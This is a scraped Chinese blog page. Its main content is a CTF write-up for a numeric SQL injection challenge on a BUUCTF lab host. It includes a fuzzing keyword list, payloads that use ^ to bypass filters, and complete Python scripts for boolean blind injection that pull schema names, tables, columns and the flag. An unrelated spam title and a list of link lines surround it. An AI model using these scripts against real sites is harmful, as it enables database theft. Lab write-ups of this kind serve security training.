当前位置: 首页 > news >正文

毕业设计网站成品凡客之家推广平台

毕业设计网站成品,凡客之家推广平台,大学学校类网站设计,网站被挂黑链怎么处理这里是数字型注入#xff0c;选择一个序号 fuzz ?id1这里过滤了很多东西 使用fuzzSQL字典#xff0c;这是我自己定义编写的一个fuzz字典#xff0c;内容较少 select from information . tables whereandor |union columns updatexml extractvalue databa… 这里是数字型注入选择一个序号 fuzz ?id1这里过滤了很多东西 使用fuzzSQL字典这是我自己定义编写的一个fuzz字典内容较少 select from information . tables whereandor |union columns updatexml extractvalue database table_name column_name schema_name -- %25 like ||( ) group_concat database OR 1%0A1 1%091 1%0C1 1%0D1 1%201 * / - ^ ifsubstr mid ascii limit ord , from for offset in length concat使用bp加载字典进行测试 看出被拦截的关键字相应大小为890那么之外的就是没有被拦截的 空格被过滤了这里使用 ^ 来计算是否为数字注入 ?id1^1 ?id1^0 ?id0^1通过测试可以发现除了第一个其他都执行成功也就是说是数字型注入 也就是可以通过布尔注入来测试 ?id0^(测试语句)如果测试语句为真那么整体返回真 那么我们的思路如下 得到所有数据库查询指定数据库的数据表查询数据表的所有字段 使用python脚本编写如果响应为429那么就是请求过快需要等待一会再进行请求 获取所有数据库 import requests from time import sleep url http://dd9a70f3-f3ef-42bd-8286-fe0bdccac825.node4.buuoj.cn:81/search.php?id0^({}) # 如果为真时的关键字匹配 base Click others # 盲注的字符集 chars ,abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789inject ord(substr((SELECT(GROUP_CONCAT(schema_name))FROM(information_schema.schemata)),{},1)){} for i in range(1, 1000):continue_ Falsefor c in chars:u url.format(inject.format(i,ord(c)))res requests.get(u)while res.status_code 429:sleep(1)res requests.get(u)if base in res.text:print(c,end,flushTrue)continue_ Truebreakif not continue_:breakinformation_schema,mysql,performance_schema,test,geek获取表 inject ord(substr((SELECT(GROUP_CONCAT(table_name))FROM(information_schema.tables)WHERE(table_schemageek)),{},1)){} for i in range(1, 1000):continue_ Falsefor c in chars:u url.format(inject.format(i,ord(c)))res requests.get(u)while res.status_code 429:sleep(1)res requests.get(u)if base in res.text:print(c,end,flushTrue)continue_ Truebreakif not continue_:break F1naI1y,Flaaaaag获取列 inject ord(substr((SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_nameF1naI1y)),{},1)){} for i in range(1, 1000):continue_ Falsefor c in chars:u url.format(inject.format(i,ord(c)))res requests.get(u)while res.status_code 429:sleep(1)res requests.get(u)if base in res.text:print(c,end,flushTrue)continue_ Truebreakif not continue_:breakid,username,password获取flag import requests import string from time import sleep url http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id0^({}) # 如果为真时的关键字匹配 base Click others # 盲注的字符集 chars string.printableinject ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1)){} for i in range(1, 1000):continue_ Falsefor c in chars:u url.format(inject.format(i,ord(c)))res requests.get(u)while res.status_code 429:sleep(1)res requests.get(u)if base in res.text:print(c,end,flushTrue)continue_ Truebreakif not continue_:break 这里使用 reverse 是因为flag在最后面将得到的结果反转即可得到flag }42e24a1d9455-24bb-fac4-fdf9-e863df96{galf flag{69fd368e-9fdf-4caf-bb42-5549d1a42e24}
http://www.zqtcl.cn/news/990614/

相关文章:

  • 六盘水市住房和城乡建设局网站标签云wordpress
  • dedecms可以做什么网站织梦做的网站在手机上显示
  • 温州建设小学的网站吐鲁番seo快速排名
  • 翼城网站建设重庆平台网站建设多少钱
  • 短视频网站的动画是怎么做的外贸一般用什么平台
  • 北京建站开发企业网站建设平台
  • 建设网站建设什么征琴他达拉非
  • 详情页制作网站广州建设工程招标信息网
  • wordpress 响应速度慢长沙seo排名扣费
  • 网站首页二级下拉框怎么做酒店网站建设方案
  • 公众号流量投放网络优化工程师有前途吗
  • 电影网站app怎么做的网站关键词是什么
  • 成都做网站建设公司建设网站总结报告
  • 个人网站要备案嘛免费响应式模板网站
  • 淘宝网站内站建设免费个人网站怎么建立
  • 网站运营经验分享ppt沉默是金粤语谐音歌词
  • 建设部网站人员查询wordpress中文 手机版
  • 大港油田建设网站电子商务公司取名字参考大全
  • 贵阳网站建设多点互动wordpress分页出现404
  • wap微信网站模板网站如何做链接
  • 泉州专业网站开发公司怎么免费做公司网页
  • 嵌入式软件开发前景怎么样百度官方优化指南
  • 网站访问速度优化工具网页设计模板图片大全
  • 哪里有手机网站制作公司网页设计与制作心得体会800字
  • 湖南建设厅网站首页简述网站建设的基本思路
  • 蚌埠公司做网站网站开发月薪
  • 怎么更换网站logo推荐几个没封的正能量网站
  • 开网站的宣传图片怎么做php网站建设面试
  • 哪些网站可以下载视频网站建设评价量规
  • 惠州市建设局网站网站模块设计怎么做